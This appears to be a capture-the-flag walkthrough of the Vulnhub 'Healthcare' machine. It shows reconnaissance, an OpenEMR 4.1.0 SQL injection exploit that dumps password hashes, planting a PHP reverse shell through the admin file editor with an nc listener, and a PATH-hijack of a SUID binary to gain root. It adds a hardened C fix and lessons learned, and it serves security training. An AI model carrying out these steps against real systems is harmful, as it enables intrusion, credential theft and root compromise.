Healthcare

Author: jason huawen

Target Machine Information

Name:

Address:

Identifying the Target Host's IP Address

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH
192.168.56.254  08:00:27:f6:d1:32      1      60  PCS Systemtechnik GmbH

Kali Linux's netdiscover tool identifies the target host's IP address as 192.168.56.254.

NMAP Scan

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
|_/all_our_e-mail_addresses /admin/ /
|_http-title: Coming Soon 2
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

The NMAP scan shows that the target host has 2 open ports: 21 (ftp) and 80 (http).

Getting a Shell

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
Name (192.168.56.254:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit ProFTPD
-----------------------------------------------------------------

  1. FTP does not allow anonymous access.

  2. The FTP service is ProFTPD, which may be affected by the mod_copy vulnerability.

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ curl http://192.168.56.254/robots.txt
# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /

robots.txt contains an /admin/ entry, but requesting that directory returns a page-not-found error.

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-21 22:08:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
+ Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan  6 01:21:38 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ "robots.txt" contains 8 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 9543 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-04-21 22:09:10 (GMT-4) (57 seconds)
---------------------------------------------------------------------------

The nikto scan reports a shellshock vulnerability; a search turns up this exploit code:

https://www.exploit-db.com/exploits/34900

However, that code does not work here, so another way in has to be found.

Next, enumerate the directories:

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              js,html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
/index.html           (Status: 200) [Size: 5031]
/index                (Status: 200) [Size: 5031]
/.html                (Status: 403) [Size: 1000]
/css                  (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
/js                   (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
/vendor               (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/robots.txt           (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
/gitweb               (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
/.html                (Status: 403) [Size: 1000]
/phpMyAdmin           (Status: 403) [Size: 59]
/server-status        (Status: 403) [Size: 1000]
/server-info          (Status: 403) [Size: 1000]
/openemr              (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]

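The scan finds the /openemr directory; the other directories are of no value.

Visiting that directory shows that the CMS is OpenEMR, version 4.1.0. Check whether any related vulnerabilities exist: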

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit openEMR 4.1.0
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 4.1.0 - 'u' SQL Injection                                                           | php/webapps/49742.py
Openemr-4.1.0 - SQL Injection                                                               | php/webapps/17998.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit -m php/webapps/49742.py
  Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
      URL: https://www.exploit-db.com/exploits/49742
     Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Healthcare/49742.py

Copy the exploit code to the working directory and run it:

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ python 49742.py
   ____                   ________  _______     __ __   ___ ____
  / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \
 / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
/ /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/
    /_/
    ____  ___           __   _____ ____    __    _
   / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)
  / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /
 / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/
   exploit by @ikuamike
[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d

Look up the hashes on an online cracking site:

https://md5decrypt.net/en/Sha1/#answer

This gives ackbar as the admin password; the other user's password is medical.

Log in:

http://192.168.56.254/openemr/

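The Administration section offers an Edit file function. Check whether the shell.php code can be added to one of the files, for example statement.inc.php; the full path of the file is also shown. After appending the shell.php code to statement.inc.php, request that file: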

http://192.168.56.254/openemr/sites/default/statement.inc.php

This yields a reverse shell on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
 20:50:43 up  1:55,  0 users,  load average: 1.00, 1.28, 3.57
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd /home
cd /home
bash-4.1$ ls -alh
ls -alh
total 20K
drwxr-xr-x  5 root     root     4.0K Jul 29  2020 .
drwxr-xr-x 21 root     root     4.0K Apr 21 18:54 ..
drwxr-xr-x 27 almirant almirant 4.0K Jul 29  2020 almirant
drwxr-xr-x 31 medical  medical  4.0K Nov  5  2011 medical
drwxr-xr-x  3 root     root     4.0K Nov  4  2011 mysql
bash-4.1$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e

This gives the user flag.

Privilege Escalation

See whether the password obtained earlier can be used to switch the shell to the medical user:

bash-4.1$ su - medical
su - medical
Password: medical
[medical@localhost ~]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)

Our guess was correct.

[medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null

/usr/bin/healthcheck has the SUID bit set.

[medical@localhost backups]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

healthcheck runs ifconfig by its bare name, without an absolute path, so we can supply our own ifconfig command and escalate privileges that way:

cd /tmp
[medical@localhost tmp]$ echo '/bin/bash' > ifconfig
echo '/bin/bash' > ifconfig
[medical@localhost tmp]$ chmod 777 ifconfig
chmod 777 ifconfig
[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 920K
drwxr-x--- 20 root root 4.0K Jul 29  2020 ./
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
-rw-------  1 root root  426 Jul 29  2020 .bash_history
-rw-r--r--  1 root root  193 Sep 24  2011 .bash_profile
-rw-rw-rw-  1 root root  422 Sep  6  2011 .bashrc
drwxr-xr-x  2 root root 4.0K Sep 12  2011 .cache/
drwx------  6 root root 4.0K Sep 12  2011 .config/
drwx------  3 root root 4.0K Jul 19  2011 .dbus/
drwxr--r--  2 root root 4.0K Jul 19  2011 Desktop/
-rw-------  1 root root   28 Jul 22  2011 .dmrc
drwx------  3 root root 4.0K Sep  8  2011 Documents/
drwx------  2 root root 4.0K Sep  6  2011 drakx/
drwx------  4 root root 4.0K Sep 24  2011 .gconf/
drwx------  2 root root 4.0K Sep 24  2011 .gconfd/
drwx------  3 root root 4.0K Sep 12  2011 .gnome2/
drwx------  2 root root 4.0K Sep 12  2011 .gnome2_private/
drwx------  3 root root 4.0K Jul 29  2020 .gnupg/
drwx------  2 root root 4.0K Jul 19  2011 .gvfs/
-rwxr-xr-x  1 root root 5.7K Jul 29  2020 healthcheck*
-rw-r--r--  1 root root  182 Jul 29  2020 healthcheck.c
-rw-------  1 root root    0 Sep 11  2011 .ICEauthority
drwx------  3 root root 4.0K Sep  6  2011 .local/
drwx------  3 root root 4.0K Nov  5  2011 .mc/
-rw-r--r--  1 root root    0 Oct 22  2010 .mdk-menu-migrated
-rw-r--r--  1 root root    0 Jul 21  2011 .menu-updates.stamp
-rw-------  1 root root    6 Jul 29  2020 .mysql_history
-rw-rw-rw-  1 root root 2.1K Jul 29  2020 root.txt
-rw-r--r--  1 root root 797K Apr 12  2020 sudo.rpm
drwx------  2 root root 4.0K Nov  5  2011 .synaptic/
drwx------  2 root root 4.0K Sep 11  2011 .thumbnails/
drwx------  2 root root 4.0K Apr 21 18:54 tmp/
drwxr-xr-x  2 root root 4.0K Jul 29  2020 .xauth/
-rw-r--r--  1 root root 1.9K Jul  6  2011 .xbindkeysrc
[root@localhost root]# cat root.txt
cat root.txt
██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██
 ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██
  ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██
   ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██
   ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██

Thanks for Playing!
Follow me at: http://v1n1v131r4.com
root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
[root@localhost root]#
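
The strings output above shows setuid, setgid and system() next to a command line of bare program names, which is why a caller-controlled PATH decides what runs as root. A hardened way for a privileged binary to run those commands, as an added example (not the machine's healthcheck.c, whose source the page does not show); run_trusted() is a hypothetical helper and the absolute tool paths are assumptions for a typical Linux layout:

```c
/* Added example: hardened way to run the health-check commands.
 * run_trusted() is a hypothetical helper, not code from the target. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment: the caller's PATH, LD_* and so on are never inherited. */
static char *const CLEAN_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Run argv[0] directly, without a shell and without a PATH lookup.
 * Returns the child's exit status, or -1 if argv[0] is not an absolute
 * path or the child could not be created or did not exit normally. */
int run_trusted(char *const argv[])
{
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/')
        return -1;                       /* a bare "ifconfig" is refused */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, CLEAN_ENV);
        _exit(127);                      /* exec failed, e.g. no such file */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Absolute tool paths are assumptions; adjust to the system at hand. */
    char *const ifconfig[] = { "/sbin/ifconfig", NULL };
    char *const fdisk[]    = { "/sbin/fdisk", "-l", NULL };
    char *const du[]       = { "/usr/bin/du", "-h", NULL };
    int failed = 0;

    puts("System Health Check");
    fflush(stdout);                      /* keep output ordered around fork */
    failed |= run_trusted(ifconfig) != 0;
    failed |= run_trusted(fdisk) != 0;
    failed |= run_trusted(du) != 0;
    return failed ? EXIT_FAILURE : EXIT_SUCCESS;
}
```

With execve() on an absolute path and a fixed environment, a file named ifconfig in /tmp and an exported PATH no longer influence what the privileged process executes. Removing the SUID bit where root is not needed is the simpler fix.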

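At this point the root shell and the root flag have been obtained.

Lessons Learned

  1. Once nikto reported that the target might be vulnerable to shellshock, it was assumed that the vulnerability could be exploited, and the normal step for a web application, directory enumeration, was neglected. It also takes enough patience to find the relevant directory; otherwise this machine cannot be solved.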

STRIVE FOR PROGRESS, NOT FOR PERFECTION